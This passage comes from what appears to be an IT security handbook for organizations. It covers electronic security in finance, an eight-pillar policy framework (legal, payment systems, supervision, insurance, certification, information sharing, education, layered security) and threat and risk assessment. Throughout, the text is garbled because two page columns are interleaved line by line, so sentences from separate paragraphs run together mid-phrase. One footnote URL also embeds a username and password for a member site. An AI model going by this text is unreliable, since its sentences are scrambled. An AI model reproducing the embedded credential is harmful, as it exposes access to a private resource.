managers. In a technology-focused company, there is Unfortunately, many of these computers are unprotected the danger that critical intellectual property may be and their users do not understand basic safe computing insufficiently protected from theft or destruction. practices. As a result, it is likely that areas of high tech- nological growth, like China, will be exploited by attackers As a safeguard against such problems, all SMEs should to spread viruses, worms, Trojans, and blends of all three conduct a complete review of their mission, goals, around the world. competencies, and information systems. If they are work- ing in areas that may create security risks for others, Current software tools offer a range of protection against developing emerging technologies, for example, they malicious code, but they are unable to offer full defense should examine the likely threats to their customers' against all forms of attack. Embracing a multi-layered security and develop mitigation plans. If they are work- defense model, from both a technical and human ing in areas that will face government scrutiny, offering perspective, merely lowers the risk of a malicious code products and services in telecommunications, for exam- incident--it does not eliminate it. "Blended Threats" like ple, then they should understand when and how they Code Red, Slammer, Klez, and Bugbear can permanently may be legally responsible for adhering to government compromise networks. Many worms do not carry destructive mandates. An Internet Service Provider is an example payloads themselves; instead, they install trap doors in of a business that runs both types of risk. By hooking computer systems, thus allowing easy and frequent network customers up to the Internet, they are creating potential access for anyone familiar with the trap-door locations. 40 In larger technology companies, or startups planning to grow rapidly, the management team is composed of individuals with specialized areas of business or technical expertise. These roles include, but are not limited to: Chief Executive Officer (CEO), Chief Financial Officer (CFO), Chief Technology Officer (CTO), Chief Information Officer (CIO) and, increasingly Chief Security Officer (CSO). There are also a range of Vice President positions in a typi- cal corporation, including VPs of Marketing, Sales, and Business Development. While such formal structure may not be necessary (or possible) in a smaller enterprise, it is useful to see how responsibilities are divided up in large firms and to note the growing importance of the CSO 41See the 2003 World Bank paper "Blended Electronic Security Threats: Code Red, Klez, Slammer and BugBear" by Tom Kellermann and Yumi Nishiyama listed at: http://wbln0018.worldbank.org/html/FinancialSectorWeb.nsf/SearchGeneral?openform&E-Security/E-Finance&Publications . Information Technology Security Handbook SECURITY FOR ORGANIZATIONS 85 Moreover, worms are, in some ways, more effective at IT security issues facing enterprises, large and small, disabling systems than viruses are, due to their ability in the developed and developing world. The sections are to exploit vulnerabilities in common applications, such as designed with a specific focus on actions to be taken by web browsers. executives, managers, and employees in order to protect their systems, their customers, their suppliers, and other Given this computing environment, users should educate stakeholders in the enterprise. The checklists and procedur- themselves about the risks and take actions appropriate al notes can easily be adapted for use in a non-profit to their individual situations. When safe computing or government agency context. is exercised, the risk of an attack can be dramatically lowered, though it cannot be eliminated. Since the threat In addition to internal policies and procedures, some SMEs of deliberate computer sabotage is significant for organiza- may choose to outsource their security needs. In the tions, it is important to examine the risks posed to industrialized world, some experts say that outsourcing for individual security and to include the risks associated non-core services like IT security has been the corporate with financial transactions and the new challenges strategy of the decade. In addition, some organizations posed by mobile computing platforms. have a specific interest in global security needs, particularly those of developing countries. As an example, ISACA, the Advantages of IT and IT Management Information System Audit and Control Association has part- nerships in 60 countries and provides cases from various In spite of the challenges, entrepreneurs and managers countries, and programs, all available as open source.42 in the public and private sectors in developing countries ISACA also offers an audit and control framework for organ- P are investing in new information and communication izations and includes checklists for outsourcing situations. ART technologies, including e-mail, the Internet, wireless telephony, and business software to assist in running Whether conducted and controlled in-house or through their day-to-day operations. The advantages in efficiency, outside vendors, developing and maintaining strong security THREE outreach, and cost savings in these new devices and infrastructure, policies, and procedures is a balancing services are clear: act for most enterprises. Executives, managers, and policy makers must weigh the risks and set a standard that 1. They improve business communications with balances the investment in security with the official customers, suppliers, and partners; objectives and bottom line growth of the company. 2. They enhance the ability to access large quantities Once a company has achieved the desired level of security, of information quickly and cheaply; and the management must not forget the importance of main- 3. They provide a means to expand data protection taining up-to-date systems and performing regular audits and management capabilities, resulting in better of the security plan. Changes in computer and networking record keeping for financial managers, better equipment, from proprietary to Open Source software customer analysis for sales and marketing packages, for example, will require a complete review of managers, and better production statistics for the security blueprint. In short, security is an art form, line managers. rather than a science, and requires the coordination of many creative thinkers to ensure its successful impact However, as we have seen, these improvements are not on an organization and society as a whole.43 without risk, both the physical assets and to less tangible information assets. Part 3 of this Handbook will explore the 42For further information on the cases and programs, see the Information Systems Audit and Control Association at: www.isaca.org. One such study fea- tured the country of Uruguay that might be of particular interest to readers of this handbook: http://www.isaca.org/ct_case.htm. COBIT (http://www.isaca.org/cobit.htm) provides a reference framework on e-Security for management, users, and IS audit, control, and security practi- tioners. The latest communication from ISACA will give you a good overview of current and future developments of the Association: Volume 8 2003 of Global Communiqué: http://ISACF:RESEARCH4@www.isaca.org/@member/gcomm/gcv034.pdf 43Due to the rise in security incidents globally, a number of consulting firms have been producing reports on IT in an international context. See, for example, Ernst & Young's 2003 Global Information Security Survey: http://www.ey.com/global/download.nsf/US/TSRS_Global_Information_Security_Survey_2003/$file/TSRS_- _Global_Information_Security_Survey_2003.pdf 86 INFORMATION SECURITY AND GOVERNMENT POLICIES CHAPTER 2. possible approaches for bridging those gaps. It also OVERVIEW OF E-SECURITY RISK acknowledges some of the efforts underway around the world aimed at resolving these issues. MITIGATION 44 At a Glance What is electronic security? Broadly speaking, electronic security is any tool, This chapter of the Handbook identifies, defines, technique, or process used to protect a system's and discusses, under eight pillars, policies, processes, information assets. Electronic security enhances the and an overall infrastructure that can foster a secure value of a network and is composed of soft and hard electronic environment for the financial services sector. infrastructure. The soft infrastructure components are It is intended for policymakers working with financial the policies, processes, protocols, and guidelines that services providers, especially executives, chief informa- protect the system and the data from compromise. The tion, and security officers. The technical sections should hard infrastructure consists of hardware and software be of special use to those who administer electronic needed to protect the system and data from threats to security systems, bank examiners who evaluate the ade- security from inside or outside the organization. The quacy of electronic security, and those who deal with degree of electronic security used for any activity the associated day-to-day risks inherent in electronic should be proportional to the activity's underlying transactions. value. Appropriate security measures will mitigate Security in e-Finance (but not eliminate) the risk for the underlying transaction, in proportion to its value. A recent series of papers on e-finance identified elec- Electronic security will require more attention tronic security as crucial to enabling electronic finance as new technology creates new risks and as to meet business and consumer expectations and deliver technologies converge. the benefits provided by technology and leapfrogging.45 E-security touches the heart of the new economy; the E-finance is the use of electronic means to exchange potential benefits to global markets and the interna- information, transfer signs and representations of value, tional community are substantial. However, the process and execute transactions in a commercial environment. of building a global electronic economy merits deep E-finance comprises four primary channels: electronic discussion of emerging business and policy issues: funds transfers (EFTs), electronic data interchange how should we define and protect privacy?, what do (EDI), electronic benefits transfers (EBTs), trust and confidence mean in a digital environment?, and electronic trade confirmations (ETCs). how can one determine the appropriate level of security and how can one measure the return on the security Although e-finance offers developing market economies investment? an expanded opportunity for commerce, the capability poses a number of serious risks. All four channels of Due to the ever-changing nature of technology, this e-finance are susceptible to fraud, theft, embezzlement, Handbook does not treat all these issues nor does it pilfering, and extortion. Most of the commerce-related attempt to provide definitive answers. Rather, it offers crimes that take place over the Internet are not new-- a view of what has transpired to date, the gaps that fraud, theft, impersonation, and extortion demands have are opening in the electronic security area, and some plagued the financial services industry for years. However, 44This Chapter is drawn from a report produced by Thomas Glaessner, Tom Kellermann, and Valerie McNevin for The World Bank (2002) entitled: "Electronic Security: Risk Mitigation in Financial Transactions." See link at: http://wbln0018.worldbank.org/html/FinancialSectorWeb.nsf/SearchGeneral?openform&E-Security/E-Finance&Publications 45See a number of works by Glaessner, Kellermann, and McNevin including "Electronic Safety and Soundness: Securing Finance in a Digital Age, Public Policy Issues (October 2003). This Monograph is the culmination of efforts over the past three years and builds upon a series of papers. These include: "Electronic Security: Risk Mitigation in Financial Transactions" (May 2002, June 2002, July 2002), "Electronic Finance: A New Approach to Financial Sector Development?" (2002), and "Mobile Risk Management: E-Finance in the Wireless Environment" (May 2002). All papers are available at: www.worldbank1.org/finance Information Technology Security Handbook SECURITY FOR ORGANIZATIONS 87 technological advance opens up new dimensions of depth, In addition to e-security, many vendors supply a scope, and timing. Technology creates the possibility for multitude of interlinking services to the e-finance crimes of great magnitude and complexity to be com- providers in various countries. These services include mitted quickly and anonymously. In the past, stealing hosting companies, Internet Service Providers (ISPs), 50,000 credit card numbers would have taken months, and providers of financial services. Telecommunication perhaps years, for highly organized criminals. Today one companies in emerging markets are often the key criminal using software tools freely available on the providers of cellular, satellite, and microwave services Web can hack into a database and steal that number as well. Such companies may also supply hosting of identities in seconds. services and de facto money transmission services. In some cases, they may also provide certain electronic Recent surveys suggest that in the United States, 57% of security services. all hack attacks were initiated in the financial sector last year. Many breaches such as one incurred by the U.S. The cross-linking ownership of the e-security and Treasury result from a failure to implement appropriate e-finance industries raises complex questions of competi- risk-management processes or from the use of off-the- tion policy and potential conflicts of interest. In the case shelf commercial software without a layered approach to of competition policy, do the multiple roles played by security, involving personnel policies, communications telecom companies act to inhibit competition, guidelines, and regular updating of the technical means particularly in emerging markets where the technical deployed, such as virus scanners and firewalls. The results expertise to provide such services often resides in of well-publicized security breaches range from financial these companies? What about assuring the integrity P and reputation loss to a potential backlash against elec- of the services provided and company policies on report- ART tronic transactions stemming from mass consumer dis- ing security breaches promptly and accurately? Moreover, trust of the e-finance and e-commerce media. outsourcing trends in this industry highlight the impor- tance of reviewing the extent of downstream liability THREE The network-mediated economy presents unparalleled involved with this complex set of vendors. Typically, opportunities for both the creation of wealth and the contracts between financial entities and their providers theft or destruction of it. In assessing its promises and use service-level percentages as a performance guarantee weighing these against potential pitfalls, policy and deci- on a sliding-cost scale, but they do not build in suffi- sion makers should educate themselves about the role cient remedies to address product performance from a that e-security plays in ensuring safe and reliable busi- security perspective. ness transactions via the Internet. The public interest case for regulation of electronic The electronic security industry is growing and security within the financial services industry must globalizing; it will present public policy challenges in be recognized. Important trade-offs exist between elec- the areas of competition policy, potential conflicts of tronic security and such areas as costs, quality interest, and certification. of service, technological innovation, and privacy. Formulation of regulation and policy needs to E-security companies and vendors generally fall into three take explicit account of these trade-offs. categories: access, use, and assessment. Today's industry includes companies that provide active content monitor- Traditionally, the telecommunications industry has been ing and data filtering, develop intrusion detection servic- regulated as being essential to public health, interest, es, place firewalls, conduct penetration tests to expose and welfare. Hence, a core component of its regulatory hardware or software vulnerabilities, offer encryption model was to expand service to give everyone access. software or services, and create authentication software In many countries, access to basic service is now or services that use passwords, tokens, keys, and biomet- considered a necessity of modern life. Historically, rics to verify the identity of the parties or the integrity the financial services industry has been regulated by of the data. the premise that trust and confidence are paramount to the orderly movement of trade, goods, and money. 88 INFORMATION SECURITY AND GOVERNMENT POLICIES And, given that a special trust is conferred on financial · Cyber crime entities, they must conduct their business in a safe, · Anti-money laundering sound, and prudent manner. Convergence of the · Enforcement infrastructure telecommunications industry and the financial services sector through the Internet heightens the importance Together, these six areas of policy, law and enforcement of and the necessity for sound public policy and should address the basic relationships among all informed regulation to ensure that government, participants and the transactional activity that flows business, and people continue to have access to through the payments system. A cornerstone of an secure financial services. e-finance legal framework is to recognize the legal validity of consumer electronic signatures, transactions, Efforts to develop public policy to improve or establish or records. The legal framework should prefer technology- electronic security measures should take into consideration neutral solutions, provide basic consumer protections for the following eight important pillars: electronically based transactional activity, promote interoperability, and address evidentiary issues. (i) An adequate legal and enforcement framework; (ii) Technical and managerial arrangements to ensure Electronic Transactions electronic security of payment systems; (iii) Robust supervision and prevention, to creates Electronic transactions law should define what is better incentives to implement appropriate meant by an electronic signature, record, or transaction, layered risk-management systems, including recognizing the legal validity of each element. The policy electronic security for financial services should be especially careful in defining an electronic providers; signature. Definitions should be technology-neutral to (iv) A framework within which private insurance the greatest degree possible, in order to allow various companies can insure against and monitor e-risk, technical solutions to enter the marketplace. thereby helping to improve standards in this area via the underwriting covenants they require; Payment Systems Security (v) Digital signatures; (vi) Information sharing; Development of policy for payment systems security (vii) Education of citizens, employees, should consider all entities that directly affect the sys- and management on security issues; and tem. All such entities should operate in a secure manner (viii) A layered security structure. so as to protect the integrity and reliability of the system. Further, policy could require timely and accurate report- Pillar I: Legal Framework and Enforcement ing on all electronic -related money losses or suspected losses and intrusions. And finally, policies could require Countries adopting electronic banking or electronic that the financial institution and related providers have delivery of other financial services (e.g., distribution sufficient risk protection. and trading of securities) must consider electronic security concerns as they develop their laws, policies Privacy and practices. They must promote the use of security to protect back-end and front-end electronic operations Privacy law should encompass data protection and use, and should reform their criminal laws to address cyber consumer protection and business requirements, and crime. notices about an entity's policy on information use. The European Union (EU) continues to be the leader in In the policy design process, an e-finance legal frame- providing privacy protection to its citizens with the 1995 work should take the following areas into accounts: EU Directive on Data Protection. At a minimum, the privacy law should embrace the fair information practice · Electronic transactions and electronic commerce principles, including notice, choice, access, minimum · Payment systems security information necessary to complete the transaction. · Privacy Information Technology Security Handbook SECURITY FOR ORGANIZATIONS 89 Cyber Crime46 Definition of a Money Transmitter Every nation should have in place laws addressing A money transmitter is any commercial enterprise abuses of a computer or network that result in loss or engaged in the transfer and exchange of monetary destruction to the computer or network, as well as asso- instruments and currency. Often these non-depository ciated losses. The law should also provide the tools and entities are involved in the "money service business" resources needed to investigate, prosecute, and punish and serve as third-party automated clearinghouse perpetrators of cyber crimes. An example of such laws providers.47 In considering the security of the electronic and directives may be seen in the Council of Europe's payment system, regulators should recognize that a Convention on Cybercrime, discussed at length in Part 4 new paradigm for money movement has evolved in a of this Handbook. sophisticated IT environment. The significant amount of money that flows around banks instead of through Anti­Money Laundering them has a significant impact on the global payment system, monetary policy, and economic forecasting. These statutes should define money laundering and encourage international cooperation in the investiga- Reporting Requirements tion, prosecution, and punishment of such crimes, giving special attention to money laundering threats The failure to report security incidents, particularly in inherent in new or developing technologies. the financial services area, enables further engagement in unsafe and unsound activities and further losses to P Enforcement those who use such payment systems without check or ART prevention. One approach is to place an affirmative Perhaps as important as the legal framework will be duty on executives48 to report incidents. the need to enforce the provisions of e-security laws THREE within and across national boundaries. Many different Regulatory Initiatives types of computer intrusions originate through activities conducted in countries with weak legal and Regulators should consider how broadly to extend enforcement regimes for electronic security, making supervision and enforcement over transmission vehicles. international cooperation essential. The primary reason cited by most people for refusing to use electronic transmission vehicles is fear that the Pillar II: Electronic Security of Payment information is not adequately protected. Proper protection Systems could strengthen consumer confidence and market discipline, paving the way for greater use of electronic Payment systems are a critical component of any financial systems. financial system. Policies to mitigate risk to payment systems should address the following five problems: Indemnifications and Warranties 1. The definition of money transmitters. Financial institutions could require warranties and 2. Reporting requirements. indemnifications from businesses that create software 3. Regulation. and hardware or supply it to financial services providers. 4. Warranties, indemnification, and liabilities. They also could require the companies that provide 5. Security requirements for service providers. these products to be liable if losses occur as a result of software or hardware "holes." Entities providing services or products to the financial services industry could, perhaps, be held to a higher standard of care or 46The Council of Europe, Convention on Cybercrime, "http://conventions.coe.int" 47These services may include money order issuance, wire transfers, currency exchange, and so on. 48Particularly Chief Information Officers and Information Security Officers. 90 INFORMATION SECURITY AND GOVERNMENT POLICIES required to explain up front that its product is not existing capital adequacy framework. As the private configured or otherwise appropriate for use in this insurance industry becomes more active in this field, sector. A variation on this solution is to require a dis- this approach may be feasible, subject to the overall claimer on hardware or software stating that it should soundness and health of the insurance industry and its not be used to create, move, or store confidential, privi- structure in emerging markets.50 leged, or sensitive information and that if it is used for those purposes the manufacturer cannot be held liable. Downstream Liability Standards for Service Providers The legal or regulatory framework could create incentives for hosting companies, application Service providers to the financial services industry also service providers, and software, hardware, could be held to a higher standard than those not and e-security providers to be accountable to interacting directly with that industry. Again, this the financial services industry. effort would go a long way toward building trust and confidence. Supervision and Examination Processes Pillar III: Supervision and Prevention The Basel Committee on Banking Supervision's Challenges Electronic Banking Group (EBG) was formed to make recommendations for needed additions, changes, or In addition to monitoring the payments system and improvements in supervision and examination to accom- supervising money transmitters, there would be a benefit modate the new technologies. In 2001 the EBG released to revisiting the regulatory, supervisory, and preventive Risk Management Principles for E-Banking, which approaches to ensuring security for financial services includes specific principles calling for proper authoriza- providers. This is particularly true for businesses that tion and authentication measures, and internal controls engage in electronic banking or provide other online and comprehensive security of e-banking assets and financial services. information. The areas of supervision and examination will undergo major reorientations over the next few Capital Requirements years. Just as the security industry experienced a paradigm shift with the mass introduction and depend- The new Basel guidelines for capital, especially those ence on PCs and the Internet, so must bank supervision dealing with operational risk, do not address the problem realize that the center of gravity in the financial services of measuring either the risk to reputation or the strategic industry is changing. risk associated with electronic security breaches. Hence, there is a question of how best to measure a bank's oper- Coordination of agencies within and across borders ational risks when the information about computer securi- ty incidents is not accurate and when defining reputation One key issue facing most countries is the need to damage is difficult. Given the problems involved in meas- improve information exchange between regulatory and uring capital adequacy in cases of electronic security risk, law enforcement agencies. Many countries have several one effective approach might be to use the examination agencies for gathering critical information, but often process to identify and remedy electronic security breach- the data is not shared by these agencies or with the es in coordination with better incentives for reporting agencies of other nations (sometimes for legal reasons). such incidents.49 In addition, authorities could encourage The issue of information exchange between agencies in or even require financial services providers to insure both domestic and international contexts is beyond the against some aspects of e-risks (e.g., denial of service, scope of this Handbook. However, as governments try to identity theft) that are not taken into account within the leverage scarce resources in order to regulate and battle 49See the discussion of Pillar VI in this executive summary. 50In many emerging markets, the insurance industry itself may need to be restructured and be stable; however, crossborder provision of such coverage may be an option. Information Technology Security Handbook SECURITY FOR ORGANIZATIONS 91 crime in the electronic environment, information sharing solutions that require e-security vendors and other and international cooperation are key issues. e-enabling companies (hosting, etc.) to engage in risk sharing and to bear appropriate liability for Pillar IV: The Role of Private Insurance as security breaches. a Complementary Monitoring System Pillar V: Certification, Standards, and the Financial supervisory agencies are still developing Roles of the Public and Private Sectors regulatory standards. Due to the difficulties inherent in monitoring complex transactions taking place over Both public and private entities should work rapidly changing technological infrastructures, it is cooperatively to develop standards and to important to seek complementary private solutions to harmonize certification schemes. Two categories monitor risks. The insurance industry already is playing that require particular attention in terms of certification a role in this area despite the defects present in the deal with electronic security service providers and information that is used to price e-risk coverage. Over transaction elements. the next few years, in the United States market alone, the growth in e-commerce liability insurance and e-risk One possible approach in securing e-finance would be for coverage may total as much as $2.5 billion annually. financial regulators to require licensing of vendors that directly affect the payment system. Another approach Still in its early development, insurance related to would be to require the industry to certify vendors that e-commerce liability and e-risk has problems in first- provide electronic security services. Recently the security P and third-party coverage. The pricing of cyber-risk industry has developed a Security Expert certification. By ART insurance is also in need of further development, using a certification approach, the industry benefits by but to accomplish this, the insurance industry needs providing consumers with a recognizable structure, a better base of information on security breaches and accountability between the industry and its experts, and THREE associated risks. Current underwriting practices for this a means of separating the approved expert from the self- form of insurance have paid insufficient attention to proclaimed expert. It also elevates the field of security to the special risks that wireless technologies bring to the a professional status and creates an incentive for the delivery of financial services. Insurance providers could industry to raise and protect standards. require that explicit electronic security standards for wireless technology be identified and used to mitigate A second area to consider is the certification of these risks before they underwrite e-risk policies. transaction elements such as electronic signatures. Certification can add value to a transaction, depending The global insurance industry can serve as an important on who or what provides the certification and on the force for change in electronic security requirements. elements that are being certified. Certification may be First, it can strive to improve the minimum standards offered by a governmental entity, such as a post office, or for electronic security in the financial services industry. a private entity, such as a bank. Each of these scenarios The global insurance industry could advocate the use of presents unique structural and governance issues. In enhanced layered electronic security as a business pre- many countries private companies (financial services requisite, for example. Second, insurance companies providers or non-financial companies) may be better could require that financial services entities use vendors equipped to provide the information infrastructure that meet certified, industry-accepted standards to pro- required to act as certification agents or to provide vide electronic security services as a way of mitigating cross-certification. their risks of underwriting coverage. Third, insurance companies could encourage regulators to require that The essential element to a successful certification scheme financial services entities provide and improve the quality is that certification structures located in different jurisdic- of data and information on incidents so they can con- tions must provide the same attributes to the transaction duct better actuarial analysis on e-risks and return on consistently and that a certifier's scope of authority and investment. Finally, the industry could promote liability must remain uniform across jurisdictional borders. 92 INFORMATION SECURITY AND GOVERNMENT POLICIES Although the use of PKI technology and certification axiomatic that the more "connected" the economy authorities is often touted as the only accepted means becomes, the more important it is for each element to of ensuring security, it is necessary to consider the costs bear its portion of the burden. Today's financial services and the cumbersome structure associated with PKI, as industry was founded as an integrated system. The tech- well as the legal inconsistencies associated with certifi- nological changes of the past decade have expanded and cation authorities. The practical element is that the heightened the interdependencies of that system. solution be applicable across borders in terms of scope and liability, no matter what technology is used to perform Pillar VII: Education and Prevention of the function. E-Security Incidents Pillar VI: Accuracy of Information on Statistical analysis reveals that in many countries E-Security Incidents and throughout the world, more than 50% of electronic Public-Private Sector Cooperation security intrusions are carried out by insiders. An undereducated workforce is inherently more vulnerable The lack of accurate information on e-security incidents to internal attack. By contrast, a well-educated work- is the result of the lack of knowledge or motivation to force that is conscious of security issues can effectively capture the data, measure it, and share it. Electronic add a layer of protection. security would improve worldwide through the enhance- ment of national and cross-border arrangements to facili- Educational initiatives could be targeted at financial tate sharing by financial services providers of accurate services providers (bothsystems administrators and information on denial-of-service intrusions, thefts, management), at various agencies involved in law attempted fraud, and so on. Failure to share information enforcement and supervision, and at users of online not only limits awareness but, even more important, it financial services. Initiatives might include the following: can limit the development of private sector solutions · improvement of awareness and education of (including insurance). This lack of information may even financial sector participants about cyber ethics and serve to increase the cost to companies and financial appropriate user behavior on networked systems; services providers of insuring against such risks. · creation of institution-wide e-security policies on appropriate behavior and the corresponding Greater public-private sector cooperation is needed in channels for reporting intrusions or incidents in this area. For example, BITS' Security and Risk close coordination with any effort to improve Assessment Steering Committee is addressing security, worldwide information on intrusions; safety, and soundness in existing and emerging pay- · development of awareness in the banking ments, electronic commerce, and related technologies community in emerging markets about the need for through the establishment of a Financial Services "incident response plans" in case an incident Security Lab. This Lab facilitates information exchange transpires; on security issues in the financial services industry. · facilitation of cooperation and transfer of know-how Furthermore, the Internet Security Alliance, the Forum of among law enforcement entities, financial intelligence Incident and Response Security Teams (FIRST, with 56 units (FIUs), and supervisory agencies in developed worldwide offices), and the Computer Emergency and emerging markets via such devices as more Response Teams set up in various countries have shown active exchange programs between personnel; that cooperation results in greater information sharing · design of focused courses for examiners under the among law enforcement and private providers of finan- auspices of the Financial Stability Institute or other cial services. A common element in all these programs is training centers; and a reliance on confidentiality and trust; as a condition of · development of a cross-border university outreach receiving accurate information, the law enforcement and program to promote the training of future e-security academic entities do not divulge the identity of respon- professionals, while also improving the education of dents. In this area, the role of multilateral agencies to users of online financial services. facilitate cooperation deserves examination. It is Information Technology Security Handbook SECURITY FOR ORGANIZATIONS 93 Pillar VIII: Layered Security Twelve core layers of proper security are a fundamental component for maintaining the integrity of data and mitigating the risks associated with open architecture environments. The twelve-linked chain defines what security should be online. The network is only as secure as its weakest link. Details on the twelve-layers of security are provided at the end of Part 3. Provisos Parts 3 and 4 of this Handbook cover a rapidly evolving area using a cross-disciplinary approach, integrating the economy, law, and technology as appropriate. Because of its rapid growth, e-security is often wrapped in myth. Most countries, including those that have greater experience dealing with it, still know little, and emerging markets know even less. The Handbook focuses relatively more attention on lessons learned in the United States because P it is considered the birthplace of the Internet and has had ART a longer time to experience its benefits and pitfalls, as well as to create early standards.51 Just as important, the Handbook looks at the experiences and efforts of certain THREE advanced economies in Europe, as well as of countries in Asia and South America. Clearly, however, there is much to be said about a) the specific problems of emerging markets in this area, and b) the areas of legislation and institutional arrangements that are required to improve electronic security worldwide. Without such efforts, the great potential offered by adopting electronic finance and commerce can be significantly compromised, because the trust and confidence of market participants will be detrimentally affected. The chapters to follow will offer: a) methodologies of risk evaluation and loss analysis; b) practical guidance on developing security policies and procedures that are appropriate for your organization; c) general and specific advice for managers and employees on best practices in e-security; and d) a series of checklists, with an array of comments from around the world on the topic of security in business operations, particularly with regard to the financial sector and e-commerce applications. 51Historically, the Internet was derived from ARPANET, which was designed in 1969 by the Advanced Research Projects Agency, Department of Defense. 94 INFORMATION SECURITY AND GOVERNMENT POLICIES CHAPTER 3. the rise. A combination of preventive maintenance RISK EVALUATION AND LOSS supported in attitude and investment by the executive ANALYSIS team, employee training and vigilance, and clear communications throughout the organization will help reduce the threats of physical and cyber-security breaches. At A Glance Knowing Ourselves This chapter covers security risk evaluation and loss analysis in a business context. We consider a range of Although there are common themes and procedures security threats, their potential origin and action, and for securing buildings and computer systems, it is consider the severity of their effects on our day-to-day important to have a complete picture of what the operations. We outline the cornerstones of a sound organization is and what it does in order to develop an security policy and explain the basic principles of loss appropriate, cost-effective security plan. A company analysis, should a real security incident take place. that handles hazardous waste or biological materials Technology Development: New Frontiers will require a different set of policies and procedures than one that produces electronic devices. As the management begins the process of identifying potential All businesses, whether they are large or small, are security risks, it will be helpful to answer the following operating in an increasingly global environment. five questions: Advances in communications and transportation net- works in the last century have brought customers and 1. What is the main product or service offered by the markets closer together and it is now possible, at rela- organization? If there are multiple answers, try to tively minimal cost, to ship products to buyers in all prioritize the elements of each answer. corners of the world. In this international context, 2. What are the main sources of revenue and growth executive and managers must consider the range of for the organization? threats to their enterprises. Since the late 1990s, 3. How is the organization structured: what are the there has been an increase in violent attacks all over different departments and what are their main the world, including the World Trade Center attack in functions? How do these units operate, 2001. In response, there has been a heightened aware- communicate, and fit together as a whole? ness of physical security needs ­ the need to police the 4. What information assets are the most critical to space around buildings, to control access to buildings, each department and what types of technology to design sound policies for evacuation in the event of does the organization use to store and disseminate a disaster, and to develop stronger points of contact this information internally and externally (when with the local and federal authorities. applicable)? 5. Who are the customers, partners, and vendors for On the technological front, there is a corresponding the organization and how do they interact? need to survey the threats to computing equipment (hardware), the applications and databases that reside on that equipment (software), and the networks that The information needed to answer these questions connect groups, both internally and with the outside will be found through conversations with employees world. In a business environment, raw data such as cus- (especially the IT staff), managers, and executives of tomer records or credit card information are valuable to the company. It will be useful to evaluate customer competitors and computer criminals and require special and supplier feedback on other issues as this may lead attention. In addition, for more advanced enterprises, to revelations on security issues. Finally, the team intellectual property including scientific research or gathering the information should be familiar with media unique business processes have high value and also reports about the company. Public perceptions may also require special security measures. As the world becomes be instructive, especially if the company is involved in a an increasingly competitive place, the theft of both raw controversial industry, is located near a hot spot of data and intellectual property assets via computer is on Information Technology Security Handbook SECURITY FOR ORGANIZATIONS 95 activity, or has appeared in prominent publications on tempting, though misleading, to stereotype the types of a regular basis. people who hack computers. However, there are some general comments to be made on the severity of the Knowing the Enemy: Internal and threat and the forms of damage that come from each External Threats paradigm. Once the company has assessed its structure and Casual, or "summertime" hackers are employees of an functions, it will be in a better position to develop a organization with some familiarity with network protocols. profile of its potential strengths and weakness in the They are typically not intent on damaging data or com- area of security. Initially, it should focus on general pany property, they are merely curious and tempted by threats present to any organization. Once these threats the challenge of attempting to access resources that are understood, an evaluation of the level of internal and they are not authorized to use. However, they may not external threats posed to its operations will be possible. fully understand the hacking tools they are using and may damage systems through improper use. Further, if General threats to any company or formal organization they have downloaded tools from the Internet, they include: may be downloaded program that contain backdoors and Trojan horses for other attackers to use. This is a serious Physical threats- Disasters (fire, earthquake, major threat and is one reason why casual hacking should be storms, flooding) forbidden in an enterprise. Theft P Vandalism Script kiddies are generally younger hackers (high ART Physical Interference with or school or college age) with reasonably good computer Destruction of Networks skills and too much time on their hands. On the whole, Corporate Spying they are not focused on doing serious damage in the THREE way that a targeting criminal is, but they are numerous Software threats- Penetration of Firewalls and sometimes work in teams, posing a greater threat Malicious code (Viruses, Trojans, than they might as individuals. One of the tricky issues Logic Bombs, Worms) with script kiddies is that a successful hack, well publi- Unauthorized dissemination or cized, will be a claim to fame; they are lured by the destruction of data potential notoriety conferred by high profile intrusions Corporate Spying via Digital Means and pranks. Due to the prevalence of this threat, security software makers have developed fairly effective tools Of the threats that are posed by human actions, the against this form of hacking; firewalls and Intrusion company should assess both internal and external per- Detection Systems (IDSs) are optimized for defending petrators. In some cases, internal security breaches may against young attackers. stem from human error: simple ignorance, inattention, or inadequate training on the part of employees. In Targeting criminals are focused, often skillful attackers other areas, especially corporate spying, social engi- with clear intent to steal information, corrupt, or neering may be used to gain access to facilities, confi- destroy data and render systems useless for extended dential business data, or knowledgeable individuals periods of time. Unlike casual hackers and script kid- within a firm. An appropriate set of policies established dies, targeting criminals generally have an incentive to by the security department, in conjunction with the hack systems. In some cases, they are looking for valu- personnel department, may help to alleviate such able information such as financial data (credit cards threats; Security and Personnel may also work together numbers, bank account details) or personal data that on employee hiring and termination procedures. may be manipulated or exploited in some way (identifi- The motivations behind malicious computer activities cation numbers, academic records, customer files). This are varied and deserve some explanation, though in type of attacker is often well organized and will perform some cases, a clear motive is very hard to define. It is several intrusions to gather information prior to an 96 INFORMATION SECURITY AND GOVERNMENT POLICIES actual attack. Fortunately the targeting criminal is less Practical Security Assessment: prevalent than other types of attackers. However, he or Risk Evaluation and Loss Analysis she is more difficult to contain and is more likely to do serious damage, once a penetration has occurred. As we have seen, security breaches may stem from internal or external attacks and result in unauthorized Employees and consultants may become deliberate access to systems and data that may or may not be or accidental security threats depending on the nature used for unethical or illegal purposes. The first steps of their relationship with their managers and peers in in forming a security policy are taken when the the workplace. Due to their level of access inside the organization conducts a security assessment organization they are a serious concern from a security covering its internal processes, objectives, and standpoint. Like the casual hacker, some may work from current vulnerabilities. Once these elements have boredom or the attraction of a technical challenge. been analyzed, a security policy and procedures Some may be seeking information related to promotions, plan may be developed. salaries of colleagues, or business data. Others may be disgruntled employees seeking to inflict pain on the This plan should include information on these key areas: organization by whatever means necessary, and others may be accidental threats, leaving systems unprotected · Knowing when you are under attack - through the through insufficient technical training or carelessness. deployment of Intrusion Detection Systems (IDSs) and internal vigilance. Each of these potential human threats to systems and information security poses a different level of danger · Preparing for the worst-case scenario ­ think about and requires a different method of containment. spill over effects for each form of security breach. Up-to-date Firewalls and IDSs may be adequate to keep out casual attackers or script kiddies. Vigilant systems · Developing a written policy to deal with break-in administrators and managers will be needed to detect plan to write up security incidents; a written record and stop targeting criminal, personnel policies and will help analyze individual events and assist in management attention will help in thwarting potential preventing successful attacks in the future. attackers inside the organization. However, no plan is completely foolproof and it is important for the organi- · Hiring an expert if you need one ­ this may be on zation to study its history and trends with regard to an incident-related basis, or a regular consulting security breaches, continued surveillance of the security arrangement. Beware of hiring self-proclaimed landscape will make the tasks of detection and preven- hackers. Security outsourcing will be covered later tion easier. In addition, clearly articulated policies on in this section.52 what should happen during and after an attack will help cushion the impact of an intrusion and guide the per- · Providing the necessary training to technical staff sonnel responsible for attending to the damage and filing and other employees ­ many security breaches are the 